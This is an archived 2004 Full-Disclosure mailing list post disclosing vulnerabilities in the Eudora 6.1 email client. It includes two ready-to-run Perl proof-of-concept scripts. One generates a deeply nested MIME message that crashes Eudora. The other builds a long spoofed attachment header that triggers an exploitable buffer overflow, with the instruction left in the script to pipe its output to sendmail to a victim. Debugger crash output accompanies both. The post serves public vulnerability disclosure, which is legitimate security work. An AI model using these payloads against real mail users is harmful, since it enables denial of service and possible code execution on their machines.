[Full-Disclosure] Eudora 6.1 is evil

From: Paul Szabo (psz_at_maths.usyd.edu.au)
Date: 04/19/04

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Super Worm"
    To: NTBugtraq@listserv.ntbugtraq.com, beckley@qualcomm.com, bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: Tue, 20 Apr 2004 07:57:36 +1000 (EST)
    
    

    Eudora 6.1 on Windows is evil - have tested "Light Mode" (free) only so
    far, do not know if "Sponsored Mode" or "Paid Mode" would be any different.
    (Do not use: stay away from Eudora, or maybe use version 6.0.3.)

    ---
    Attachment spoof, LaunchProtect:
      http://lists.netsys.com/pipermail/full-disclosure/2004-March/018897.html
    Works (i.e. broken) same as the 6.0.3 version.
    ---
    Nested MIME DoS:
      http://lists.netsys.com/pipermail/full-disclosure/2004-April/020075.html
    Works "better" than the 6.0.3 version, crashes at 580 levels:
    #!/usr/bin/perl --
    print "From: me\n";
    print "To: you\n";
    print "Subject: nested multipart test\n";
    print "Mime-Version: 1.0\n";
    print "X-Use: Pipe the output of this script into:  sendmail -i victim\n";
    &nest(0);
    print "\n";
    #
    sub nest {
      my ($x) = @_;
      my $b = sprintf("bndry%04d",$x);
      print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Level $x\n\n";
    # No problem for 570, but crash for 580 deep nesting:
    # 
    # (444.458): Stack overflow - code c00000fd (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=00033494 edi=62000000
    # eip=77f862ed esp=00032afc ebp=0003339c iopl=0         nv up ei pl nz na po nc
    # cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
    # ntdll!LdrLoadAlternateResourceModule+9:
    # 77f862ed 53               push    ebx
      if ($x < 580) {
        print "--$b\n";
        &nest($x+1);
      }
      print "--$b\n";
      print "Content-Type: text/plain\n\n";
      print "Final $x\n";
      print "--$b--\n\n";
    }
    ---
    "Long attachment spoof" execute-any-code bug:
      http://lists.netsys.com/pipermail/full-disclosure/2003-September/010029.html
    from version 6.0 and previous (but apparently fixed in 6.0.1 and 6.0.3) is
    back:
    #!/usr/bin/perl --
    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.1 buffer overflow demo\n";
    print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
    print "Long spoofed attachments cause an exploitable buffer overflow:\n";
    # (298.40c): Access violation - code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=800403e9 ebx=00000005 ecx=41414141 edx=00a22040 esi=00002966 edi=026a65b4
    # eip=41414141 esp=0012f65c ebp=41414141 iopl=0         nv up ei ng nz ac pe cy
    # cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010293
    # 41414141 ??               ???
    print "Attachment Converted\r: ", "A"x300,"\n\n";
    ---
    Cheers,
    Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics  University of Sydney   2006  Australia
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Super Worm"

    Relevant Pages

    • Eudora 6.1 is evil
      ... do not know if "Sponsored Mode" or "Paid Mode" would be any different. ... stay away from Eudora, ... Attachment spoof, LaunchProtect: ... # First chance exceptions are reported before any exception handling. ...
      (Full-Disclosure)
    • Eudora 6.1 is evil
      ... do not know if "Sponsored Mode" or "Paid Mode" would be any different. ... stay away from Eudora, ... Attachment spoof, LaunchProtect: ... # First chance exceptions are reported before any exception handling. ...
      (Bugtraq)
    • Re: [opensuse] Eudora in Wine
      ... Eudora works well in this environment, with the exception that when I attempt to import something, e.g., addresses or mail directories I get an unhand led exception error message and Eudora closes. ... I was wondering if anyone has managed to get Eudora to work in wine and has been able to import files? ... I'm afraid I'm not at all hep. ...
      (SuSE)
    • [opensuse] Re: Eudora in Wine
      ... I get an unhand led exception error message and Eudora closes. ... I was wondering if anyone has managed to get Eudora to work in wine and ... it on a "real windows" machine or vm, ...
      (SuSE)